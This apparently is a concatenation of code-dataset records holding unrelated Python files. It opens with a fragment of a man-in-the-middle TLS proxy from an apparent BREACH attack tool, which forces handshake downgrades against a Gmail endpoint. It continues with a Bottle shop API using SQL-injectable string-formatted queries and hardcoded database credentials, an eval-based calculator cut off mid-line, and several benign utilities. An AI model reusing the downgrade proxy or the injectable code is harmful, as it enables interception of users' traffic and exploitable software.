previous record\n if past_bytes_endpoint:\n lg.append('Data from previous TLS record: Endpoint\\n')\n if past_bytes_endpoint >= len(data):\n lg.append(self.log_data(data))\n lg.append('\\n')\n past_bytes_endpoint = past_bytes_endpoint - len(data)\n return ('\\n'.join(lg), past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, downgrade)\n else:\n lg.append(self.log_data(data[0:past_bytes_endpoint]))\n lg.append('\\n')\n data = data[past_bytes_endpoint:]\n past_bytes_endpoint = 0\n else:\n if chunked_user_header:\n data = chunked_user_header + data\n chunked_user_header = None\n if past_bytes_user:\n lg.append('Data from previous TLS record: User\\n')\n if past_bytes_user >= len(data):\n lg.append(self.log_data(data))\n lg.append('\\n')\n past_bytes_user = past_bytes_user - len(data)\n return ('\\n'.join(lg), past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, downgrade)\n else:\n lg.append(self.log_data(data[0:past_bytes_user]))\n lg.append('\\n')\n data = data[past_bytes_user:]\n past_bytes_user = 0\n\n try:\n cont_type = ord(data[constants.TLS_CONTENT_TYPE])\n version = (ord(data[constants.TLS_VERSION_MAJOR]), ord(data[constants.TLS_VERSION_MINOR]))\n length = 256*ord(data[constants.TLS_LENGTH_MAJOR]) + ord(data[constants.TLS_LENGTH_MINOR])\n except Exception as exc:\n self.full_logger.debug('Only %d remaining for next record, TLS header gets chunked' % len(data))\n self.full_logger.debug(exc)\n if is_response:\n chunked_endpoint_header = data\n else:\n chunked_user_header = data\n return ('', past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, downgrade)\n\n if is_response:\n if cont_type in constants.TLS_CONTENT:\n self.basic_logger.debug('Endpoint %s Length: %d' % (constants.TLS_CONTENT[cont_type], length))\n '''\n if cont_type == 23:\n with open('out.out', 'a') as f:\n f.write('Endpoint application payload: %d\\n' % length)\n f.close()\n '''\n else:\n self.basic_logger.debug('Unassigned Content Type record (len = %d)' % len(data))\n lg.append('Source : Endpoint')\n else:\n if cont_type in constants.TLS_CONTENT:\n self.basic_logger.debug('User %s Length: %d' % (constants.TLS_CONTENT[cont_type], length))\n if cont_type == 22:\n if ord(data[constants.MAX_TLS_POSITION]) > constants.MAX_TLS_ALLOWED:\n downgrade = True\n '''\n if cont_type == 23:\n with open('out.out', 'a') as f:\n f.write('User application payload: %d\\n' % length)\n f.close()\n '''\n else:\n self.basic_logger.debug('Unassigned Content Type record (len = %d)' % len(data))\n lg.append('Source : User')\n\n try:\n lg.append('Content Type : ' + constants.TLS_CONTENT[cont_type])\n except:\n lg.append('Content Type: Unassigned %d' % cont_type)\n try:\n lg.append('TLS Version : ' + constants.TLS_VERSION[(version[0], version[1])])\n except:\n lg.append('TLS Version: Uknown %d %d' % (version[0], version[1]))\n lg.append('TLS Payload Length: %d' % length)\n lg.append('(Remaining) Packet Data length: %d\\n' % len(data))\n\n # Check if TLS record spans to next TCP segment\n if len(data) - constants.TLS_HEADER_LENGTH < length:\n if is_response:\n past_bytes_endpoint = length + constants.TLS_HEADER_LENGTH - len(data)\n else:\n past_bytes_user = length + constants.TLS_HEADER_LENGTH - len(data)\n\n lg.append(self.log_data(data[0:constants.TLS_HEADER_LENGTH]))\n lg.append(self.log_data(data[constants.TLS_HEADER_LENGTH:constants.TLS_HEADER_LENGTH+length]))\n lg.append('\\n')\n\n # Check if packet has more than one TLS records\n if length < len(data) - constants.TLS_HEADER_LENGTH:\n more_records, past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, _ = self.parse(data[constants.TLS_HEADER_LENGTH+length:],\n past_bytes_endpoint,\n past_bytes_user,\n chunked_endpoint_header,\n chunked_user_header,\n is_response)\n lg.append(more_records)\n\n return ('\\n'.join(lg), past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, downgrade)\n\n def start(self):\n '''\n Start sockets on user side (proxy as server) and endpoint side (proxy as client).\n '''\n self.full_logger.info('Starting Proxy')\n\n try:\n self.user_setup()\n self.endpoint_setup()\n except:\n pass\n\n self.full_logger.info('Proxy is set up')\n return\n\n def restart(self, attempt_counter=0):\n '''\n Restart sockets in case of error.\n '''\n self.full_logger.info('Restarting Proxy')\n\n try:\n self.user_socket.close()\n self.endpoint_socket.close()\n except:\n pass\n\n try:\n self.user_setup()\n self.endpoint_setup()\n except:\n if attempt_counter < 3:\n self.full_logger.debug('Reattempting restart')\n self.restart(attempt_counter+1)\n else:\n self.full_logger.debug('Multiple failed attempts to restart')\n self.stop(-9)\n sys.exit(-1)\n\n self.full_logger.info('Proxy has restarted')\n return\n\n def stop(self, exit_code=0):\n '''\n Shutdown sockets and terminate connection.\n '''\n try:\n self.user_connection.close()\n self.endpoint_socket.close()\n except:\n pass\n self.full_logger.info('Connection closed')\n self.debug_logger.debug('Stopping breach object with code: %d' % exit_code)\n return\n\n def user_setup(self):\n '''\n Create and configure user side socket.\n '''\n try:\n self.full_logger.info('Setting up user socket')\n user_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n user_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Set options to reuse socket\n user_socket.bind((constants.USER, constants.TLS_PORT))\n self.full_logger.info('User socket bind complete')\n user_socket.listen(1)\n self.full_logger.info('User socket listen complete')\n self.user_connection, self.address = user_socket.accept()\n self.user_socket = user_socket\n self.full_logger.info('User socket is set up')\n except:\n self.stop(-8)\n sys.exit(-1)\n return\n\n def endpoint_setup(self):\n '''\n Create and configure endpoint side socket\n '''\n try:\n self.full_logger.info('Setting up endpoint socket')\n endpoint_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.full_logger.info('Connecting endpoint socket')\n endpoint_socket.connect((constants.GMAIL_IP, constants.TLS_PORT))\n endpoint_socket.setblocking(0) # Set non-blocking, i.e. raise exception if send/recv is not completed\n self.endpoint_socket = endpoint_socket\n self.full_logger.info('Endpoint socket is set up')\n except:\n self.stop(-7)\n sys.exit(-1)\n return\n\n def execute_breach(self):\n '''\n Start proxy and execute main loop\n '''\n # Initialize parameters for execution.\n past_bytes_user = 0 # Number of bytes expanding to future user packets\n past_bytes_endpoint = 0 # Number of bytes expanding to future endpoint packets\n chunked_user_header = None # TLS user header portion that gets stuck between packets\n chunked_endpoint_header = None # TLS endpoint header portion that gets stuck between packets\n\n self.start()\n self.full_logger.info('Starting main proxy loop')\n try:\n while 1:\n ready_to_read, ready_to_write, in_error = select.select([self.user_connection, self.endpoint_socket],\n [],\n [],\n 5)\n\n if self.user_connection in ready_to_read: # If user side socket is ready to read...\n data = ''\n\n try:\n data = self.user_connection.recv(constants.SOCKET_BUFFER) # ...receive data from user...\n except Exception as exc:\n self.full_logger.debug('User connection error')\n self.full_logger.debug(exc)\n self.stop(-6)\n break\n\n if len(data) == 0:\n self.full_logger.info('User connection closed')\n self.stop(-5)\n else:\n self.basic_logger.debug('User Packet Length: %d' % len(data))\n output, past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, downgrade = self.parse(data,\n past_bytes_endpoint,\n past_bytes_user,\n chunked_endpoint_header,\n chunked_user_header) # ...parse it...\n self.full_logger.debug(output)\n try:\n if downgrade and constants.ATTEMPT_DOWNGRADE:\n alert = 'HANDSHAKE_FAILURE'\n output, _, _, _, _, _ = self.parse(constants.ALERT_MESSAGES[alert],\n past_bytes_endpoint,\n past_bytes_user,\n True)\n self.full_logger.debug('\\n\\n' + 'Downgrade Attempt' + output)\n self.user_connection.sendall(constants.ALERT_MESSAGES[alert]) # if we are trying to downgrade, send fatal alert to user\n continue\n self.endpoint_socket.sendall(data) # ...and send it to endpoint\n except Exception as exc:\n self.full_logger.debug('User data forwarding error')\n self.full_logger.debug(exc)\n self.stop(-4)\n break\n\n if self.endpoint_socket in ready_to_read: # Same for the endpoint side\n data = ''\n\n try:\n data = self.endpoint_socket.recv(constants.SOCKET_BUFFER)\n except Exception as exc:\n self.full_logger.debug('Endpoint connection error')\n self.full_logger.debug(exc)\n self.stop(-3)\n break\n\n if len(data) == 0:\n self.full_logger.info('Endpoint connection closed')\n self.stop(5)\n break\n else:\n self.basic_logger.debug('Endpoint Packet Length: %d' % len(data))\n output, past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, _ = self.parse(data,\n past_bytes_endpoint,\n past_bytes_user,\n chunked_endpoint_header,\n chunked_user_header,\n True)\n self.full_logger.debug(output)\n try:\n self.user_connection.sendall(data)\n except Exception as exc:\n self.full_logger.debug('Endpoint data forwarding error')\n self.full_logger.debug(exc)\n self.stop(-2)\n break\n except:\n self.stop(-1)\n return\n\nif __name__ == '__main__':\n args_dict = get_arguments_dict(sys.argv)\n conn = Connector(args_dict)\n conn.full_logger.info('Hillclimbing parameters file created')\n conn.execute_breach()\n","sub_path":"connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":18962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"213795748","text":"from bottle import route, run, template, static_file, get, post, delete, request\nimport json\nimport pymysql\n\nconnection = pymysql.connect(host='sql11.freesqldatabase.com',\n user='sql11189251',\n password='bEzYRY6iRP',\n db='sql11189251',\n charset='utf8mb4',\n autocommit=True,\n cursorclass=pymysql.cursors.DictCursor)\ncursor = connection.cursor();\n\n\n@get(\"/admin\")\ndef admin_portal():\n return template(\"pages/admin.html\")\n\n\n# List Categories\n@get(\"/categories\")\ndef list_categories():\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM categories;\"\n cursor.execute(sql)\n result = cursor.fetchall()\n return json.dumps({'STATUS': 'SUCCESS', 'CATEGORIES': result, 'CODE': 200})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n# List All Products\n@get(\"/products\")\ndef list_all_products():\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM products;\"\n cursor.execute(sql)\n result = cursor.fetchall()\n return json.dumps({'STATUS': 'SUCCESS', 'PRODUCTS': result, 'CODE': 200})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n# List Products by Category\n@get(\"/category//products\")\ndef list_products_by_category(id):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM products WHERE category={};\".format(id)\n cursor.execute(sql)\n result = cursor.fetchall()\n return json.dumps({'STATUS': 'SUCCESS', 'PRODUCTS': result, 'CODE': 200})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n# Getting a Product\n@get(\"/product/\")\ndef get_product(id):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM products WHERE id={};\".format(id)\n cursor.execute(sql)\n result = cursor.fetchone()\n return json.dumps({'STATUS': 'SUCCESS', 'PRODUCT': result, 'CODE': 200})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n# Creating a Category (ignoring 'bad request' error as I accept any category name)\n@post(\"/category\")\ndef create_category():\n try:\n with connection.cursor() as cursor:\n new_category = request.POST.get(\"name\")\n sql = \"SELECT count(*) FROM categories WHERE name='{}'\".format(new_category)\n cursor.execute(sql)\n result = cursor.fetchone()\n if result['count(*)'] > 0:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Category already exists', 'CODE': 200})\n else:\n sql_query = \"INSERT INTO categories (name) VALUES ('{0}')\".format(new_category)\n cursor.execute(sql_query)\n result = cursor.lastrowid\n return json.dumps({'STATUS': 'SUCCESS', 'CAT_ID': result, 'CODE': 201})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n# Add/Edit a Product (ignoring 'category not found' because it is a drop-down so will always be correct)\n@post(\"/product\")\ndef add_edit_product():\n product_category = request.POST.get(\"category\")\n product_description = request.POST.get(\"description\")\n product_price = request.POST.get(\"price\")\n product_title = request.POST.get(\"title\")\n product_favorite = request.POST.get(\"favorite\")\n if product_favorite is \"on\":\n product_favorite=1\n else:\n product_favorite=0\n product_img_url = request.POST.get(\"img_url\")\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT count(*) FROM products WHERE title='{}'\".format(product_title)\n cursor.execute(sql)\n result = cursor.fetchone()\n if result['count(*)'] > 0:\n sql_update = \"UPDATE products SET category='{0}', description='{1}', price='{2}', favorite='{3}', img_url='{4}' WHERE title='{5}'\".format(product_category, product_description, product_price, product_favorite, product_img_url, product_title)\n cursor.execute(sql_update)\n product_id = 0 #sorry, from Lauren\n else:\n sql_add = \"INSERT INTO products (category, description, price, title, favorite, img_url) VALUES ({0},'{1}',{2},'{3}',{4},'{5}')\".format(product_category, product_description, product_price, product_title, product_favorite, product_img_url)\n cursor.execute(sql_add)\n product_id = cursor.lastrowid\n return json.dumps({'STATUS': 'SUCCESS', 'PRODUCT_ID': product_id, 'CODE': 201})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n# Deleting a Category\n@delete(\"/category/\")\ndef delete_category(id):\n try:\n with connection.cursor() as cursor:\n sql = \"DELETE FROM categories WHERE id={0}\".format(id)\n sql2 = \"DELETE FROM products WHERE category={0}\".format(id)\n cursor.execute(sql)\n cursor.execute(sql2)\n return json.dumps({'STATUS': 'SUCCESS', 'CODE': 201})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n# Deleting a Product\n@delete(\"/product/\")\ndef delete_product(id):\n try:\n with connection.cursor() as cursor:\n sql = \"DELETE FROM products WHERE id={0}\".format(id)\n cursor.execute(sql)\n return json.dumps({'STATUS': 'SUCCESS', 'CODE': 201})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n@get(\"/\")\ndef index():\n return template(\"index.html\")\n\n\n@get('/js/')\ndef javascripts(filename):\n return static_file(filename, root='js')\n\n\n@get('/css/')\ndef stylesheets(filename):\n return static_file(filename, root='css')\n\n\n@get('/images/')\ndef images(filename):\n return static_file(filename, root='images')\n\n\ndef main():\n run(host='localhost', port=7000)\n\nif __name__ == '__main__':\n main()","sub_path":"store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"95014649","text":"# -*- coding: utf-8 -*-\n# [名前] getip.py\n# [起動] python getip.py\n# [仕様] 接続先のグローバルipを取得し標準出力する\n# ログを標準エラー出力に緑色で出力する\n# [備考] シグナリングサーバ(server.py)を外部サーバー(sairilab.com:10007)であらかじめ起動させる必要がある\n\nimport socket\nimport sys\n\nserverHost='sairilab.com' #デフォルトシグナリングサーバー\nlocalHost='0.0.0.0'\nport=25001\nlocalAddr=(localHost,port)\nserverAddr=(serverHost,10007)\nOKGREEN = '\\033[92m'\nWARNING = '\\033[93m'\nFAIL = '\\033[91m'\nENDC = '\\033[0m'\n\n\nsock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\nsock.bind(localAddr)\nsys.stderr.write(OKGREEN + \"[東京会場 getip.py] : UDPソケットのバインド (%s:%d)\\n\" % localAddr)\nsock.sendto(\"ping\",serverAddr)\nsys.stderr.write(\"[東京会場 getip.py] : シグナリングサーバーへの問い合わせ.. (%s:%d)\\n\" % serverAddr)\n\ntargetIp,addr=sock.recvfrom(1024)\n\nsys.stderr.write(\"[東京会場 getip.py] : 接続先グローバルアドレス = %s\\n\" % targetIp)\nsys.stderr.write(ENDC)\nsys.stdout.write(\"%s\\n\" % targetIp)\n\nsock.close()\n\n\n","sub_path":"controllerTokyo/getip.py","file_name":"getip.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"222170118","text":"import numpy as np\nimport os\nimport torch\nfrom PIL import Image\n\nclass Logger():\n def __init__(self, path):\n self.logFile = open(path+\"log.txt\", \"w\")\n def __del__(self):\n self.logFile.close()\n\n def log(self, logStr):\n print(logStr)\n self.logFile.write(logStr+\"\\n\")\n self.logFile.flush()\n\n\ndef weightsInit(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n torch.nn.init.normal_(m.weight, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n torch.nn.init.normal_(m.weight, 1.0, 0.02)\n torch.nn.init.zeros_(m.bias)\n\n\n\ndef listAllImg(dataPath):\n filePaths = []\n for root, dir, files in os.walk(dataPath):\n for file in files:\n if file.endswith(\".jpg\") or file.endswith(\".png\"):\n filePath = os.path.join(root, file)\n filePaths.append(filePath)\n \n return filePaths\n\ndef saveImage(args, epoch, i, imgs, interval=150):\n \n if i % interval != 0:\n return\n \n imgs = [img for img in imgs if img != None]\n\n for idx in range(len(imgs)):\n imgs[idx] = np.transpose(np.float32(imgs[idx].to(\"cpu\").detach().numpy()[0])*255, (1,2,0))\n\n img = combine(imgs)\n img.save(args.savePath+\"img_%d_%d.png\"%(epoch,i))\n\ndef combine(imgs):\n\n for i in range(len(imgs)):\n imgs[i] = Image.fromarray(np.uint8(imgs[i]))\n\n widths, heights = zip(*(i.size for i in imgs))\n totalWidth = sum(widths)\n totalHeight = max(heights)\n\n new_img = Image.new(\"RGB\", (totalWidth, totalHeight))\n offset = 0\n for img in imgs:\n new_img.paste(img, (offset, 0))\n offset += img.size[0]\n\n return new_img\n \n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"359438585","text":"from finished_bo import bak_ost\r\nfrom fgm import fgm\r\nimport math\r\nimport numpy as np\r\nimport time\r\n\r\ndef clog(x):\r\n vector = list(sorted(x, reverse=True))\r\n k = [math.log2(i) for i in range(1, len(vector) + 1)]\r\n ln = len(vector)\r\n y = [math.log2(i) for i in vector]\r\n A = np.vstack([k, np.ones(len(k))]).T\r\n m, c = np.linalg.lstsq(A, y)[0]\r\n return m\r\n\r\ndef main():\r\n result = open(\"test_res2.txt\", \"w\")\r\n a_variants = [0.5, 0.25, 0.75, 0.3]\r\n for a in a_variants:\r\n result.write(str(a) + \"\\n\")\r\n print(a)\r\n for k in range(5):\r\n graph = bak_ost(100000, 10, a)\r\n t = time.time()\r\n x = fgm(graph)\r\n t = time.time() - t\r\n lg = clog(x)\r\n print(lg, t)\r\n result.write(str(lg) + \" \" + str(t) + \"\\n\")\r\n graph = 0\r\n result.close()\r\n\r\nmain()\r\n","sub_path":"prlib/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"188317784","text":"from django.shortcuts import render\nimport urllib3, json\nfrom django.http import JsonResponse\n\n\ndef index(request):\n if request.method == 'POST':\n if request.is_ajax():\n\n plakakodu = request.POST.get('plakakodu', None)\n iladi = request.POST.get('iladi', None)\n\n url = 'http://api.openweathermap.org/data/2.5/weather?q='+ iladi +'&appid=3ecd62f50fb752799243ba9fb83cc79b&units=metric'\n http = urllib3.PoolManager()\n request = http.request('GET', url)\n JSON = json.loads(request.data.decode('utf8'))\n\n veri = {\n \"plakakodu\" : plakakodu,\n \"iladi\" : iladi,\n \"sicaklik\" : JSON['main']['temp'],\n }\n return JsonResponse(veri)\n return render(request, 'trHarita/index.html')","sub_path":"trHarita/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"300243941","text":"import math\nimport service\nimport fog_node\nimport matplotlib.pyplot as plt\n\nC = 6e7\n\ndef propagationDelay(point1, point2):\n return math.hypot(point1[0] - point2[0], point1[1] - point2[1]) / C\n\ndef getComputNodeDelay(srcDst, computeNode):\n tau = 0\n if computeNode.type is \"edge\" or computeNode.type is \"Edge\":\n tau += propagationDelay(srcDst[\"position\"], srcDst[\"switch\"][\"position\"])\n tau += propagationDelay(computeNode.position, computeNode.switch[\"position\"])\n tau += srcDst[\"switch\"][\"delay\"]\n if srcDst[\"switch\"] is not computeNode.switch:\n tau += computeNode.switch[\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"position\"])\n tau += propagationDelay(computeNode.switch[\"position\"], computeNode.switch[\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"delay\"]\n if srcDst[\"switch\"][\"parent\"] is not computeNode.switch[\"parent\"]:\n tau += computeNode.switch[\"parent\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"])\n tau += propagationDelay(computeNode.switch[\"parent\"][\"position\"], computeNode.switch[\"parent\"][\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"parent\"][\"delay\"]\n if srcDst[\"switch\"][\"parent\"][\"parent\"] is not computeNode.switch[\"parent\"][\"parent\"]:\n tau += computeNode.switch[\"parent\"][\"parent\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"], computeNode.switch[\"parent\"][\"parent\"][\"position\"])\n elif computeNode.type is \"cloud\" or computeNode.type is \"Cloud\":\n tau += propagationDelay(srcDst[\"position\"], srcDst[\"switch\"][\"position\"])\n tau += srcDst[\"switch\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"parent\"][\"delay\"]\n if srcDst[\"switch\"][\"parent\"][\"parent\"] is not computeNode.switch:\n tau += computeNode.switch[\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"], computeNode.switch[\"position\"])\n tau += propagationDelay(computeNode.position, computeNode.switch[\"position\"])\n else:\n raise Exception(\"{} not found\".format(computeNode.type))\n return tau\n\nclass Simulator:\n def __init__(self, name, d, switches, epsilon=1e0):\n self.name = name\n self.epsilon = epsilon\n self.switches = switches\n for list1, list2 in zip(self.switches[0:2], self.switches[1:3]):\n for switch1 in list1:\n distances = [(switch1[\"position\"][0]-switch2[\"position\"][0])**2+(switch1[\"position\"][1]-switch2[\"position\"][1])**2 for switch2 in list2]\n switch2 = list2[distances.index(min(distances))]\n switch1[\"parent\"] = switch2\n self.fogNodes = []\n self.services = []\n self.totalUtilityList = []\n self.roundCount = 0;\n\n def getSwitch(self, position, level=0):\n switches = self.switches[level]\n distances = [math.hypot(switch[\"position\"][0]-position[0], switch[\"position\"][1]-position[1]) for switch in switches]\n switch = switches[distances.index(min(distances))]\n return switch\n\n def addNode(self, C, U, position):\n switch = self.getSwitch(position)\n newNode = fog_node.FogNode(index=len(self.fogNodes), C=C, U=U, type=\"Edge\", switch=switch, position=position)\n self.fogNodes.append(newNode)\n\n def addCloud(self, numberOfResources, C, U=0.1, position=[0,0]):\n switch = self.getSwitch(position, level=2)\n for index in range(numberOfResources):\n newNode = fog_node.FogNode(index=len(self.fogNodes), C=C, U=U, type=\"Cloud\", switch=switch, position=position)\n self.fogNodes.append(newNode)\n\n def addService(self, F, R,alpha, w, center, sources, destinations):\n src = [ {\"position\":s, \"switch\": self.getSwitch(s)}for s in sources]\n dst = [ {\"position\":d, \"switch\": self.getSwitch(d)}for d in destinations]\n newService = service.Service(index=len(self.services), F=F, R=R, alpha=alpha, w=w, center=center, sources=src, destinations=dst, simulator=self)\n self.services.append(newService)\n\n def totalUtility(self):\n totalUtility = 0\n for service in self.services:\n if service.node:\n if self.fogNodes[service.node].highestBidder == service.index:\n totalUtility -= service.costs[service.node]\n else:\n totalUtility -= service.R\n return totalUtility\n\n def totalCost(self):\n totalCost = 0\n for service in self.services:\n if service.node:\n if self.fogNodes[service.node].highestBidder == service.index:\n totalCost += service.costs[service.node]\n else:\n totalCost += service.R\n return totalCost\n\n def round(self):\n self.roundCount += 1\n# print('Round {}:'.format(self.roundCount))\n change = False\n for s in self.services:\n change |= s.check()\n self.totalUtilityList.append(self.totalUtility())\n return change\n\n def run(self, nearest=False, random=False):\n self.clear()\n if random or nearest:\n for s in self.services:\n if random:\n s.selectRandom()\n else:\n s.selectNearest()\n else:\n for service in self.services:\n service.initialize()\n while True:\n if not self.round():\n print('Finish')\n break\n\n def clear(self):\n self.totalUtilityList = []\n self.roundCount = 0;\n for node in self.fogNodes:\n node.reset()\n for service in self.services:\n service.reset()\n\n def reset(self):\n self.totalUtilityList = []\n self.roundCount = 0;\n self.fogNodes = []\n self.services = []\n\n def printResults(self):\n print(\"Services:\")\n for service in self.services:\n print(\"#{}\".format(service.index + 1))\n nodeIndex = service.node\n if nodeIndex:\n node = self.fogNodes[nodeIndex]\n print(\"\\tR:{}\".format(service.R))\n print(\"\\tNode #{}-> C:{}, U:{}\".format(nodeIndex, node.C, node.U))\n print(\"\\tprice: {}, r:{}, u:{}\".format(node.highestBid, service.rates[nodeIndex], node.C*node.U/service.F))\n else:\n print(\"\\tNo allocation\")\n\n def plot(self, drawLines=False):\n plt.clf()\n self._drawNetowrkTopolog()\n for node in self.fogNodes:\n position = node.position\n switch = node.switch\n plt.plot(position[0], position[1], 'b*')\n #plt.annotate(str(\"{:.2f}\".format(node.C*node.U)),xy=(node.position[0], node.position[1]), ha='center', va='bottom',color='blue')\n plt.plot([switch[\"position\"][0], position[0]], [switch[\"position\"][1], position[1]], 'k.-')\n for s in self.services:\n plt.plot(s.center[0], s.center[1], 'r.')\n if s.node:\n position = self.fogNodes[s.node].position\n plt.plot([position[0], s.center[0]], [position[1], s.center[1]], 'c.-')\n plt.show()\n\n def _drawNetowrkTopolog(self):\n for list, color in zip(self.switches[0:2], ['r', 'g']):\n for switch in list:\n plt.plot([switch[\"position\"][0], switch[\"parent\"][\"position\"][0]], [switch[\"position\"][1], switch[\"parent\"][\"position\"][1]], color + '.-')\n for list, color in zip(self.switches, ['rx', 'gx', 'bx']):\n for switch in list:\n plt.plot(switch[\"position\"][0], switch[\"position\"][1], color)\n\n def plotNetowrkTopolog(self):\n plt.clf()\n self._drawNetowrkTopolog()\n plt.show()\n\n def plotOptimalityEvolution(self):\n plt.plot(range(self.roundCount), self.totalUtilityList, 'g-')\n plt.show()\n","sub_path":"6/simulator/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":7609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"266761523","text":"#BY FRANCISCO ISRAEL CASTILLO GUTIERREZ\r\n\r\nfrom tkinter import*\r\nfrom math import*\r\n\r\n\r\nventana=Tk()\r\nventana.title(\"Calculadora\")\r\nventana.configure(background=\"green\")\r\nventana.geometry(\"392x600\")\r\nfondo = PhotoImage(file=\"descarga.gif\")\r\nlabel1 =Label(ventana, image=fondo).place(x=86, y=0)\r\nbuttom_height=3\r\nbuttom_width=11\r\n\r\n\r\ndef botonclik(num):\r\n global operador\r\n operador=operador+str(num)\r\n entrada_texto.set(operador)\r\n \r\ndef clear():\r\n global operador\r\n operador=(\"\")\r\n entrada_texto.set(\"0\")\r\n \r\ndef operacion():\r\n global operador\r\n try:\r\n opera=str(eval(operador))\r\n except:\r\n clear()\r\n opera(\"ERROR\")\r\n entrada_texto.set(opera)\r\n \r\n\r\n\r\nentrada_texto=StringVar()\r\noperador=\"\"\r\nclear()\r\n\r\nboton0 = Button(ventana, text=\"0\",bg=\"yellow3\", width=buttom_width, height=buttom_height, command=lambda:botonclik(0)).place(x=17, y=190)\r\nboton1 = Button(ventana, text=\"1\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(1)).place(x=107, y=190)\r\nboton2 = Button(ventana, text=\"2\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(2)).place(x=197, y=190)\r\nboton3 = Button(ventana, text=\"3\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(3)).place(x=287, y=190)\r\nboton4 = Button(ventana, text=\"4\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(4)).place(x=17, y=250)\r\nboton5 = Button(ventana, text=\"5\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(5)).place(x=107, y=250)\r\nboton6 = Button(ventana, text=\"6\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(6)).place(x=197, y=250)\r\nboton7 = Button(ventana, text=\"7\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(7)).place(x=287, y=250)\r\nboton8 = Button(ventana, text=\"8\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(8)).place(x=17, y=310)\r\nboton9 = Button(ventana, text=\"9\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(9)).place(x=107, y=310)\r\nboton0 = Button(ventana, text=\"PI\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"pi\")).place(x=197, y=310)\r\nboton0 = Button(ventana, text=\".\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\".\")).place(x=287, y=310)\r\nboton0 = Button(ventana, text=\"+\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"+\")).place(x=17, y=370)\r\nboton0 = Button(ventana, text=\"-\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"-\")).place(x=107, 